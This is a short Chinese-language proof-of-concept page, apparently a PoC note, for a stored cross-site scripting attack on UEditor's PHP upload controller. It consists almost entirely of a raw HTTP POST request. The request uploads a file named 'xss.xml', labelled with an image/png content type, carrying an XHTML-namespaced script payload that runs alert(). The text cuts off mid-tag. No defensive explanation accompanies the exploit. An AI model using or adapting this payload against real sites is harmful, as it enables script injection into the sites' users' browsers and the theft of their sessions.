目录
1.PHP版本POC
POST /ueditor/php/controller.php?action=uploadfile HTTP/1.1
Host: xxx.com
Cookie: xxxx(有的在前台,有的在后台)
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryL5aisVg49ZFuYNhc
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Content-Length: 324
------WebKitFormBoundaryL5aisVg49ZFuYNhc
Content-Disposition: form-data; name="upfile"; filename="xss.xml"
Content-Type: image/png
<html><head></head><body><something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(`afei_come`);</something